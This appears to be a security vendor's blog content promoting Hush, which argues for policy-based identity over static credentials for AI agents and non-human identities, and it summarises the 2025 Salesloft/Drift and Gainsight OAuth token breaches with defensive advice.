We don’t solve human identity security with scanning tools. We solve it with centralized identity governance platforms that enforce least-privilege access, monitor usage in real-time, and automate lifecycle management.

The same principles apply to non-human identities:

What’s Needed: A Unified NHI Governance Platform

1. Centralized Control Across All NHI Types

• API keys, service accounts, OAuth tokens, certificates, database credentials—managed in one platform
• Works across cloud providers (AWS, GCP, Azure), SaaS applications, on-prem systems, and custom infrastructure

2. Real-Time Runtime Visibility

• See which secrets are actively used, when, and by what
• Understand actual exploitability and business impact
• Risk scoring based on live data, not static configurations

3. Policy-Based Governance

• Apply cloud IAM security principles (least privilege, ephemeral access, policy enforcement) to ALL non-human identities
• Centralized policy engine that works uniformly across your entire tech stack

4. Built-In Remediation

• Don’t create tickets, fix the problem automatically
• Don’t rotate compromised secrets, revoke excessive permissions, enforce identity-based access policies instead
• Zero additional work for development teams

The Bottom Line

Existing NHI tools are failing because they’re solving the symptom and not curing the disease. They’re detection engines in a world that needs governance platforms.

Organizations need a centralized NHI governance and control platform, one that applies proven identity security principles across all non-human access, finds and remediates risks automatically, and scales with the explosive growth of machine identities.

It’s time to stop detecting the problem and start preventing it.

AI agents are rapidly moving from experimental tools to first-class actors inside production environments. They call LLM APIs, orchestrate workflows through MCP servers query databases like Postgres and Snowflake, and trigger actions in third‑party SaaS platforms such as Stripe.

But from a security perspective, there’s an uncomfortable truth most organizations haven’t fully confronted yet:

AI agents are operating with the same static credentials model we already know is broken-only now at machine speed and machine scale.

For CISOs, this isn’t just another secrets management problem. It’s a new, amplified data‑exfiltration risk surface.

The Hidden Risk: AI Agents Inherit the Worst of Static Credentials

Today, most AI agents authenticate exactly like legacy services:

• Long‑lived API keys for LLM providers
• Static database credentials for Postgres or Snowflake
• Hard‑coded SaaS tokens for Stripe or internal APIs
• Broad permissions granted “just in case” the agent needs them

From a risk standpoint, this creates a perfect storm:

• No identity context – Credentials don’t know who is using them or why
• No execution awareness – Access looks the same whether it’s a valid task or a malicious prompt
• No blast‑radius control – A single leaked key can unlock massive datasets
• No runtime enforcement – Once issued, the key works everywhere, all the time

When an AI agent is compromised-through prompt injection, model manipulation, supply‑chain risk, or simple misconfiguration-the organization has no meaningful way to contain the damage.

This is how silent data exfiltration happens.

Why Traditional Controls Fail Against Agentic Access

Security teams often try to compensate by layering controls around static credentials:

• Network restrictions
• Token rotation policies
• Monitoring and anomaly detection

These help-but they don’t solve the core issue.

Static credentials are non‑contextual by design. They can’t express:

• Which agent is calling the service
• What task the agent is executing
• What data should be accessible right now
• Whether the request violates business or security intent

For human identities, we solved this years ago with identity‑aware access, conditional policies, and least privilege.

For AI agents, most organizations are still stuck in 2010.

The Shift: From Secrets to Policy‑Based Agent Identity

Preventing data exfiltration by AI agents requires a fundamental shift:

Stop authenticating agents with static secrets. Start authorizing them with policy‑based identity.

In a policy‑based model:

• AI agents authenticate using a strong, verifiable runtime identity
• Access is granted dynamically, not pre‑embedded in code
• Every request is evaluated against real‑time policy
• Permissions are scoped to task, resource, and time

Instead of asking:

“Does this API key look valid?”

The system asks:

“Should this agent, performing this action, access this resource right now?”

That question is the difference between control and blind trust.

Applying Policy‑Based Access to LLMs, MCP, and SaaS

Policy‑based identity isn’t theoretical-it applies directly to the systems AI agents already touch.

LLM Services

• Limit which models an agent can access
• Restrict prompt and response scopes
• Enforce usage boundaries per task or environment
• Prevent cross‑tenant or cross‑context leakage

MCP and Internal Services

• Bind agent identity to specific workflows
• Prevent lateral movement between services
• Enforce service‑to‑service least privilege dynamically

Databases and Data Platforms

• Grant just‑in‑time access to Postgres or Snowflake
• Restrict queries to approved schemas or datasets
• Automatically revoke access when the task completes

Third‑Party SaaS (e.g., Stripe)

• Scope actions to specific operations (read vs. write vs. execute)
• Prevent high‑impact actions outside approved flows
• Eliminate long‑lived tokens embedded in agent logic

The result: even if an agent is manipulated, its ability to exfiltrate data is structurally constrained.

Why This Matters to CISOs Now

AI agents change the economics of risk.

They:

• Operate continuously
• Act autonomously
• Chain multiple systems together
• Access high‑value data at scale

A single compromised agent can do more damage, faster, than dozens of traditional workloads and services.

From a CISO perspective, this raises hard questions:

• Can we prove which agent accessed sensitive data?
• Can we enforce least privilege at runtime-not design time?
• Can we contain an incident without taking systems offline?
• Can we show auditors that agent access is governed and intentional?

Static credentials cannot answer these questions.

Policy‑based identity can.

The Solution: How Hush Enables Secure Agentic Access

Preventing data exfiltration by AI agents requires more than better secrets hygiene. It requires eliminating secrets as the primary control plane altogether.

Hush enables organizations to shift AI agents from secret-based access to policy-based identity, fundamentally changing how agentic access is granted, evaluated, and enforced at runtime.

Instead of embedding long-lived API keys, tokens, or database credentials into agent logic, Hush:

• Establishes a strong runtime identity for each AI agent
• Replaces static secrets with just-in-time, policy-evaluated access
• Authorizes every request based on who the agent is, what it is doing, and what it should access

This shift is critical for stopping data exfiltration.

With policy-based access enforced by Hush:

• AI agents never hold standing credentials that can be leaked, reused, or abused
• Access is narrowly scoped to approved actions, data sets, and services
• Permissions automatically expire when the task or context ends
• Compromised or manipulated agents are structurally limited in what data they can reach

By removing static secrets from the equation and enforcing identity-driven, runtime policy, Hush turns AI agents from an uncontrolled data exfiltration risk into governed, auditable non-human identities.

This is not an incremental improvement.

It is the difference between hoping an AI agent behaves – and ensuring it cannot cause harm even if it doesn’t.

What the Salesloft and Gainsight Breaches Really Tell Us About NHI Risk

For years, enterprises have fortified their perimeter – hard MFA, hardened SaaS, locked-down identity layers. But in 2025, the weakest link isn’t the castle gate anymore. It’s the messenger walking through it with unquestioned trust.

In today’s ecosystem, that messenger is an integration with privileged access, and the recent Salesloft and Gainsight breaches exposed just how vulnerable that blind spot is. Attackers didn’t battle their way in – they entered as invited guests.

Security teams who understand this shift are already ahead of the rest of the industry.

The Pattern: Compromise the Integration, Skip the Hard Part

Salesloft to Salesforce

In August 2025, threat actor UNC6395 compromised OAuth and refresh tokens tied to the Drift integration.
Those tokens – trusted Non-Human Identities (NHIs) – opened direct, legitimate access to hundreds of Salesforce orgs.

Once inside, attackers didn’t stop at CRM data. They exfiltrated downstream secrets:

• Snowflake tokens
• Cloud access keys
• Support-case content
• Internal operational metadata

They bypassed MFA and stepped straight into authenticated privilege.

Gainsight to Salesforce

On November 21, Just weeks later, Salesforce disclosed unusual activity tied to another integration – Gainsight.
Again: no Salesforce vulnerability, no platform exploit.

The door was opened by an integration holding elevated OAuth scopes – another NHI trusted by default. Salesforce’s statement was unambiguous: “No indication that this resulted from any vulnerability in the Salesforce platform.”

Salesforce revoked all active access and refresh tokens for the gainsight apps and removed those apps temporarily from the AppExchange. New reporting suggests the Gainsight breach might reuse secrets taken from the Salesloft/Drift incident, indicating that attackers are chaining these breaches.

Google Threat Intelligence is attributing the Gainsight breach to the related threat-actors that hit Salesloft (clusters such as UNC6240 / ShinyHunters).

The Shared Pattern: NHIs as High Privilege Attack Vectors

Both breaches followed the same blueprint – and it’s one every modern defender must internalize:

1. Compromise an integration token (NHI with broad scopes)
2. Enter customer environments with full legitimacy
3. Move laterally across connected systems
4. Harvest embedded credentials and secrets
5. Pivot into cloud infrastructure

This is large-scale, low-friction supply-chain compromise powered by unmonitored NHIs. Defenders who don’t see this pattern are operating blind.

What You Can Do Now – If You Want to Stay Ahead

1. Inventory premium-scope integrations

Map every integration, service account, and bot touching critical systems.
If you can’t see it, you can’t defend it.

2. Govern third-party integrations like first-class identities

Every vendor app is now part of your attack surface.
Demand audit logs, token controls, and operational transparency.

3. Scope and rotate all tokens / service accounts

Least privilege is not optional.
Long-lived tokens are liabilities – shorten them.
Broad scopes are risks – tighten them.

4. Formalize NHI-focused incident triage

If you find a compromised token:

• Revoke instantly
• Rotate downstream secrets
• Block or delete the previous versions
• Trace every integration that touched that token
• Assess which downstream identities could be abused
• Model possible lateral movement paths

Teams who do this well are the ones who stop incidents early – before attackers reach the crown jewels.

The Bottom Line

Sophisticated attackers no longer storm the castle.
They compromise the trusted identity already carrying the master key – the integration, the bot, the token, the NHI.

Security teams who want to lead – not react, must elevate NHI security to the same level as human identity.
Because in 2025, the kingdom doesn’t fall through the gate – it falls through the integration.

‍